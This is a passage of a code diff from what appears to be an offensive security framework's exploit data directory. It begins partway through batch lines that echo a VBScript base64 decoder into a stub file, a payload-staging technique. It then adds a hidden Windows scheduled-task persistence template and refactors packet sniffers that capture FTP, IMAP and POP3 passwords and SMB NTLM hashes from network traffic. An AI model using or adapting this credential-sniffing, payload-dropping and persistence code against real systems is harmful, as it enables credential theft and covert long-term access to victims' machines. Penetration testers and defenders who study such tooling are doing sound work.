+echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
+echo If  Not w3 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
+echo If Not w4 Then _ >>decode_stub
+echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
+echo Next >>decode_stub
+echo base64_decode = strOut >>decode_stub
+echo End Function >>decode_stub
+echo Function mimedecode(byVal strIn) >>decode_stub
+echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
+echo If Len(strIn) = 0 Then >>decode_stub
+echo mimedecode = -1 : Exit Function >>decode_stub
+echo Else >>decode_stub
+echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
+echo End If >>decode_stub
+echo End Function >>decode_stub

data/exploits/docx/[Content_Types].xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types>

data/exploits/docx/_rels/.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships>

data/exploits/docx/docProps/app.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>normal.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties>

data/exploits/docx/word/_rels/document.xml.rels

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>

data/exploits/docx/word/document.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t> </w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document>

data/exploits/docx/word/fontTable.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts>

data/exploits/docx/word/settings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings>

data/exploits/docx/word/webSettings.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:optimizeForBrowser/></w:webSettings>

data/exploits/mp4player.as

@@ -0,0 +1,22 @@
+function randText(newLength:Number):String{
+  var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
+  var alphabet:Array = a.split("");
+  var randomLetter:String = "";
+  for (var i:Number = 0; i < newLength; i++){
+    randomLetter += alphabet[Math.floor(Math.random() * alphabet.length)];
+  }
+  return randomLetter;
+}
+
+var connect_nc:NetConnection = new NetConnection();
+connect_nc.connect(null);
+
+var stream_ns:NetStream = new NetStream(connect_nc);
+stream_ns.onStatus = function(p_evt:Object):Void { }
+
+
+video.attachVideo(stream_ns);
+
+stream_ns.play(randText(Math.floor(Math.random() * 8) + 4) + ".mp4");
+
+

data/exploits/psnuffle/ftp.rb

@@ -15,6 +15,7 @@ class SnifferFTP < BaseProtocolParser
 			:pass		=> /^PASS\s+([^\s]+)/i,
 			:login_pass => /^(230\s*[^\n]+)/i,
 			:login_fail => /^(5\d\d\s*[^\n]+)/i,
+			:bye      => /^221/
 		}
 	end
 
@@ -23,6 +24,7 @@ class SnifferFTP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
 		s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "ftp"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,21 +40,17 @@ class SnifferFTP < BaseProtocolParser
 
 			when :login_fail
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Failed Login. Banner: #{s[:banner]}"
-					report_auth_info(s)
-					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					report_auth_info(s.merge({:active => false}))
+					print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 
-					s[:pass]=""
+					s[:pass] = ""
 					return
 				end
 
 			when :login_pass
 				if(s[:user] and s[:pass])
-					s[:proto]="ftp"
-					s[:extra]="Successful Login. Banner: #{s[:banner]}"
 					report_auth_info(s)
-					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
+					print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
 					# Remove it form the session objects so freeup memory
 					sessions.delete(s[:session])
 					return
@@ -60,12 +58,14 @@ class SnifferFTP < BaseProtocolParser
 
 			when :banner
 				# Because some ftp server send multiple banner we take only the first one and ignore the rest
-				if not (s[:banner])
-					sessions[s[:session]].merge!({k => matches})
-					s[:name]="FTP Server Welcome Banner: \"#{s[:banner]}\""
+				if not (s[:info])
+					s[:info] = matches
 					report_service(s)
 				end
 
+			when :bye
+				sessions.delete(s[:session])
+
 			when nil
 				# No matches, no saved state
 			else

data/exploits/psnuffle/imap.rb

@@ -25,6 +25,7 @@ class SnifferIMAP < BaseProtocolParser
 		return unless pkt.is_tcp?
 		return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
 		s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
+		s[:sname] ||= "imap4"
 
 		self.sigs.each_key do |k|
 			# There is only one pattern per run to test
@@ -38,14 +39,11 @@ class SnifferIMAP < BaseProtocolParser
 
 			case matched
 			when :banner
-				s[:banner] = matches
-				s[:name]   = "IMAP Server Welcome Banner: #{s[:banner]}"
+				s[:info] = matches
 				report_service(s)
 
 			when :login_pass
 
-				s[:proto]="imap4"
-				s[:extra]="Sucessful Login. Banner: #{s[:banner]}"
 				report_auth_info(s)
 				print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
@@ -54,18 +52,14 @@ class SnifferIMAP < BaseProtocolParser
 
 			when :login_fail
 
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup
 				sessions.delete(s[:session])
 
 			when :login_bad
-				s[:proto]="imap4"
-				s[:extra]="Failed Login. Banner: #{s[:banner]}"
-				report_auth_info(s)
+				report_auth_info(s.merge({:active => false}))
 				print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 
 				# Remove it form the session objects so freeup

data/exploits/psnuffle/pop3.rb

@@ -38,8 +38,9 @@ class SnifferPOP3 < BaseProtocolParser
 					case s[:last]
 						when nil
 							# Its the first +OK must include the banner, worst case its just +OK
-							s[:banner] = matches
-							s[:name]   = "POP3 Server Welcome Banner: \"#{s[:banner]}\""
+							s[:info]  = matches
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
 							report_service(s)
 
 						when :user
@@ -48,8 +49,9 @@ class SnifferPOP3 < BaseProtocolParser
 						when :pass
 							# Perfect we get an +OK after a PASS command this means right password given :-)
 
-							s[:proto]="pop3"
-							s[:extra]="Successful Login. Banner: #{s[:banner]}"
+							s[:proto] = "tcp"
+							s[:name]  = "pop3"
+							s[:extra] = "Successful Login. Banner: #{s[:banner]}"
 							report_auth_info(s)
 							print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
 

data/exploits/psnuffle/smb.rb

@@ -5,26 +5,31 @@
 #
 
 #Memo : 
-# Authentification without extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
-	#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
-	#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
+#FOR SMBV1
+	# Authentification without extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  0 and contains server challenge (aka encryption key) and wordcount = 17
+		#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
+		#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
 
-# Authentification with extended security set
-	#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
-	#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
-	#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
-	#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
-	#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+	# Authentification with extended security set
+		#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec  =  1
+		#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
+		#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
+		#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
+		#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
+#FOR SMBV2
+	#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response 
 
 class SnifferSMB < BaseProtocolParser
 
 	def register_sigs
 		self.sigs = {
-			:setupandx		=> /\xffSMB\x73/,
-			:negotiate		=> /\xffSMB\x72/,
+			:smb1_negotiate		=> /\xffSMB\x72/n,
+			:smb1_setupandx		=> /\xffSMB\x73/n,
+			#:smb2_negotiate	=> /\xFESMB\x40\x00(.){6}\x00\x00/n,
+			:smb2_setupandx		=> /\xFESMB\x40\x00(.){6}\x01\x00/n
 		}
 	end
 
@@ -45,7 +50,7 @@ class SnifferSMB < BaseProtocolParser
 			end
 
 			case matched
-			when :negotiate
+			when :smb1_negotiate
 				payload = pkt.payload.dup
 				wordcount = payload[36,1].unpack("C")[0]
 				#negotiate response
@@ -54,128 +59,16 @@ class SnifferSMB < BaseProtocolParser
 					#the server challenge is here
 					if flags2 & 0x800 == 0
 						s[:challenge] = payload[73,8].unpack("H*")[0]
-						s[:last]  = :negotiate
+						s[:last]  = :smb1_negotiate
 					end
 				end
 
-			when :setupandx
-				payload = pkt.payload.dup
-
-				ntlmpayload = payload[/NTLMSSP\x00.*/m]
-				if ntlmpayload
-					ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
-					case ntlmmessagetype
-					when 2 # challenge
-						s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
-						s[:last] = :ntlm_type2
-					when 3 # auth
-						if s[:last] == :ntlm_type2
-							lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
-							lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
-							ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
-							ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
-							domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
-							domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
-							usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
-							usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
-
-							s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
-							s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
-							s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
-							s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
-
-							secbloblength = payload[51,2].unpack("v")[0]
-							names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-							s[:peer_os]   = names[0] || ''
-							s[:peer_lm]   = names[1] || ''
-							s[:last] = :ntlm_type3
-						end
-					end
-				else
-					wordcount = payload[36,1].unpack("C")[0]
-					#authentification without smb extended security (smbmount, msf server capture)
-					if wordcount == 13 and s[:last]  == :negotiate
-						lmlength = 	payload[51,2].unpack("v")[0]
-						ntlmlength = 	payload[53,2].unpack("v")[0]
-						s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
-						s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
-						
-						names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
-
-						s[:user] = names[0]
-						s[:domain]   = names[1]
-						s[:peer_os]   = names[2]
-						s[:peer_lm]   = names[3]
-						s[:last] = :smb_no_ntlm
-					else
-						#answer from server
-						if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
-							#do not output anonymous/guest logging
-							unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
-								#set lmhash to a default value if not provided						   	
-								s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
-								s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
-
-								smb_status = payload[9,4].unpack("V")[0]
-								if smb_status == 0 # success
-
-									ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
-
-									logmessage =
-										"#{ntlm_ver} Response Captured in session : #{s[:session]} \n" +
-										"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
-										"SERVER CHALLENGE:#{s[:challenge]} " + 
-										"\nLMHASH:#{s[:lmhash]} " + 
-										"\nNTHASH:#{s[:ntlmhash]}\n"
-									print_status(logmessage)
-
-									src_ip = s[:host]
-									dst_ip = s[:session].split("-")[1].split(":")[0]
-									# know this is ugly , last code added :-/
-									smb_db_type_hash = case ntlm_ver
-									       when "NTLMv1" 		then "smb_netv1_hash"
-									       when "NTLM2_SESSION" 	then "smb_netv1_hash"
-									       when "NTLMv2" 		then "smb_netv2_hash"
-									       end
-									# DB reporting
-									report_auth_info(
-										:host  => dst_ip,
-										:port => 445,
-										:sname => 'smb',
-										:user => s[:user],
-										:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-										:type => smb_db_type_hash,
-										:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-										:active => true
-									)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_os",
-										:data  => s[:peer_os]
-									) if (s[:peer_os] and s[:peer_os].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_peer_lm",
-										:data  => s[:peer_lm]
-									) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
-
-									report_note(
-										:host  => src_ip,
-										:type  => "smb_domain",
-										:data  => s[:domain]
-									) if (s[:domain] and s[:domain].strip.length > 0)
-
-								end
-							end
-						end
-						s[:last] = nil
-						sessions.delete(s[:session])
-					end
-
-				end
-
+			when :smb1_setupandx
+				s[:smb_version]  = "SMBv1"
+				parse_sessionsetup(pkt, s)
+			when :smb2_setupandx
+				s[:smb_version]  = "SMBv2"
+				parse_sessionsetup(pkt, s)
 			when nil
 				# No matches, no saved state
 			else
@@ -197,6 +90,122 @@ class SnifferSMB < BaseProtocolParser
 		else
 			raise RuntimeError, "Unknow hash type"
 		end
+	end
 
+	def parse_sessionsetup(pkt, s)
+		payload = pkt.payload.dup
+		ntlmpayload = payload[/NTLMSSP\x00.*/m]
+		if ntlmpayload
+			ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
+			case ntlmmessagetype
+			when 2 # challenge
+				s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
+				s[:last] = :ntlm_type2
+			when 3 # auth
+				if s[:last] == :ntlm_type2
+					lmlength = 	ntlmpayload[12, 2].unpack("v")[0]
+					lmoffset = 	ntlmpayload[16, 2].unpack("v")[0]
+					ntlmlength = 	ntlmpayload[20, 2].unpack("v")[0]
+					ntlmoffset = 	ntlmpayload[24, 2].unpack("v")[0]
+					domainlength = 	ntlmpayload[28, 2].unpack("v")[0]
+					domainoffset = 	ntlmpayload[32, 2].unpack("v")[0]
+					usrlength = 	ntlmpayload[36, 2].unpack("v")[0]
+					usroffset = 	ntlmpayload[40, 2].unpack("v")[0]
+
+					s[:lmhash] = 	ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
+					s[:ntlmhash] =      ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
+					s[:domain] =	ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
+					s[:user] =		ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
+
+					secbloblength = payload[51,2].unpack("v")[0]
+					names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+					s[:peer_os]   = names[0] || ''
+					s[:peer_lm]   = names[1] || ''
+					s[:last] = :ntlm_type3
+				end
+			end
+		else
+			wordcount = payload[36,1].unpack("C")[0]
+			#authentification without smb extended security (smbmount, msf server capture)
+			if wordcount == 13 and s[:last]  == :smb1_negotiate and s[:smb_version]  == "SMBv1"
+				lmlength = 	payload[51,2].unpack("v")[0]
+				ntlmlength = 	payload[53,2].unpack("v")[0]
+				s[:lmhash] = 	payload[65,lmlength].unpack("H*")[0]
+				s[:ntlmhash] =  payload[65 + lmlength, ntlmlength].unpack("H*")[0]
+			
+				names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
+
+				s[:user] = names[0]
+				s[:domain]   = names[1]
+				s[:peer_os]   = names[2]
+				s[:peer_lm]   = names[3]
+				s[:last] = :smb_no_ntlm
+			else
+				#answer from server
+				if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
+					#do not output anonymous/guest logging
+					unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
+						#set lmhash to a default value if not provided						   	
+						s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m 
+						s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
+
+						smb_status = payload[9,4].unpack("V")[0]
+						if smb_status == 0 # success
+
+							ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
+
+							logmessage =
+								"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
+								"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
+								"SERVER CHALLENGE:#{s[:challenge]} " + 
+								"\nLMHASH:#{s[:lmhash]} " + 
+								"\nNTHASH:#{s[:ntlmhash]}\n"
+							print_status(logmessage)
+
+							src_ip = s[:client_host]
+							dst_ip = s[:host]
+							# know this is ugly , last code added :-/
+							smb_db_type_hash = case ntlm_ver
+							       when "NTLMv1" 		then "smb_netv1_hash"
+							       when "NTLM2_SESSION" 	then "smb_netv1_hash"
+							       when "NTLMv2" 		then "smb_netv2_hash"
+							       end
+							# DB reporting
+							report_auth_info(
+								:host  => dst_ip,
+								:port => 445,
+								:sname => 'smb',
+								:user => s[:user],
+								:pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+								:type => smb_db_type_hash,
+								:proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
+								:active => true
+							)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_os",
+								:data  => s[:peer_os]
+							) if (s[:peer_os] and s[:peer_os].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_peer_lm",
+								:data  => s[:peer_lm]
+							) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)
+
+							report_note(
+								:host  => src_ip,
+								:type  => "smb_domain",
+								:data  => s[:domain]
+							) if (s[:domain] and s[:domain].strip.length > 0)
+
+						end
+					end
+				end
+				s[:last] = nil
+				sessions.delete(s[:session])
+			end
+		end
 	end
 end

data/exploits/s4u_persistence.xml

@@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Date>DATEHERE</Date>
+    <Author>USERHERE</Author>
+  </RegistrationInfo>
+  <Triggers>
+    <TimeTrigger>
+      <Repetition>
+        <Interval>PT60M</Interval>
+        <StopAtDurationEnd>false</StopAtDurationEnd>
+      </Repetition>
+      <StartBoundary>DATEHERE</StartBoundary>
+      <Enabled>true</Enabled>
+    </TimeTrigger>
+  </Triggers>
+  <Principals>
+    <Principal id="Author">
+      <UserId>DOMAINHERE</UserId>
+      <LogonType>S4U</LogonType>
+      <RunLevel>LeastPrivilege</RunLevel>
+    </Principal>
+  </Principals>
+  <Settings>
+    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
+    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+    <AllowHardTerminate>true</AllowHardTerminate>
+    <StartWhenAvailable>false</StartWhenAvailable>
+    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+    <IdleSettings>
+      <Duration>PT10M</Duration>
+      <WaitTimeout>PT1H</WaitTimeout>
+      <StopOnIdleEnd>true</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+    <AllowStartOnDemand>true</AllowStartOnDemand>
+    <Enabled>true</Enabled>
+    <Hidden>true</Hidden>
+    <RunOnlyIfIdle>false</RunOnlyIfIdle>
+    <WakeToRun>false</WakeToRun>
+    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+    <Priority>7</Priority>
+  </Settings>
+  <Actions Context="Author">
+    <Exec>
+      <Command>COMMANDHERE</Command>
+    </Exec>
+  </Actions>
+</Task>